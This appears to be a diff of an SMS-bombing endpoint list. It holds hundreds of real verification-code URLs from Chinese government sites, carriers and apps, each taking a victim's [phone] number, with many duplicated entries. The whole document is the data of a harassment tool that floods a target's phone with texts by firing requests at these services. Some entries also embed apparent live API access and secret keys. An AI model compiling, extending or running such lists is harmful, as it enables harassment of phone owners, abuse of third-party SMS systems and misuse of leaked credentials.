"https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=103", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]&_=1523359575414", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://www.xd.com/users/sendRegisterCode?callback=jQuery110201470901275837977_1591599902822&mobile=[phone]&area_code=86&_=1591599902823", - "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", - "http://user.daojia.com/mobile/getcode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://xiangpai.jishiyuanwl.cn/api/public/?service=Login.GetCode0&mobile=[phone]&sign=2019&type=0", - "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://dxhz.xqapi.live/api.php?id=[phone]", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://open.leju.com/game/member/sendcode.html?phone=[phone]", - "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", - "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", - "http://passport.58.com/mobileauthcodelogin/getcode?valIDAtecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", - "http://e.weisns.com.cn/Jsonp/send_mobile_code_reg?callback=jQuery17208124790173017422_1582106551645&mobile=[phone]&token=00-cef055211be84b54a91287fc906bb0d90401bficbagfjjnore2etrosopaqp2rwsslaglw-09fe1fe580b4879abdbabd7ca1f5e26c-5dee0acfe62d2b442088c156&_=1582106605205", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", - "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", - "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", - "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", - "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://exmail.qq.com:80/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://api.xingchentd.com/logic-user/user:users/mobile/?mobile=[phone]&projection=withRoles", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", - "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools ?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]&_=1523359575414", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.baixing.com:80/m/oz/verify/reg?mobile=[phone]", - "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://webapi.account.mihoyo.com/Api/create_mobile_captcha?action_ticket=&action_type=regist&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://i.360.cn/smsApi/sendsmscode?condition=2&r=&callback=&account=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]&_=1523359575414", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", - "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", - "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", - "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", - "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", - "http://api-v1.ezpaychain.com/invoice/v1/user/send-sms?calling_codes=%2B86&phone_number=[phone]&type=activation&version=1", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", - "http://dxhz.xqapi.live/api.php?id=[phone]", - "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "https://consumer.fcbox.com:443/v1/account/sendCode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]&ccode=&id=PUT60101350&sid=72a49eb9c9b94b2692a44daa50e2011c&cid=72a49eb9c9b94b2692a44daa50e2011c&lng=cn&p=http%3A//www.lxcpa.net/&e=&un=&ud=&on=&d=1589617104719", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://wsdj.baic.gov.cn/common/sms/vercode/send.do?mobile=[phone]", + "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", + "http://www.zhichiwangluo.com/index.php?r=Login/phoneResetCode&phone=[phone]", + "http://uniservice.kugou.com/v2/activity/sendCode?call_number=[phone]&cb=kgJSONP239130071", + "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", + "http://www.plaso.cn/plaso/servlet/randomCode?0.47652275536418554&type=loginrandom=[phone]", + "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102009139976025888258_1433746978224&captcha_code=7998&_=1433746978226&mobile=[phone]", + "https://beacons.gcp.gvt2.com/domainreliability/upload", + "https://api.wanwudezhi.com/module-user/api/v1/user/sendSmsCode?phone=[phone]", + "http://uniservice.kugou.com/v2/activity/sendCode?call_number=[phone]&cb=kgJSONP239130071", + "http://z.7qi.me/index.php?call=[phone]&ok=", + "http://pass.hujiang.com/Handler/UCenter?action=SendMsg&callback=&imgCode=&token=&_=&mobile=[phone]", + "http://member.for68.com/member/consult/sendRandcode.shtm?mobilePhone=[phone]", + "http://511xy.pw/?hone=[phone]&s=3&admin=666&", "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]", + "http://m.login.httpcn.com/login/LoginCode?callbackparam=jQuery111106766551584217104_1592824186799&val=[phone]&_=1592824186801", "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://www.guiji.ai/market/sms?mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://wap.zt.raiyi.com/weixin/bind/verifyMobile?mobile=[phone]&appCode=fc_wx&buyChannel=OfficialAccounts&vtype=0", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://h5.gumipet.com/shops_sms_register?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://mobile.health.pingan.com:80/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - 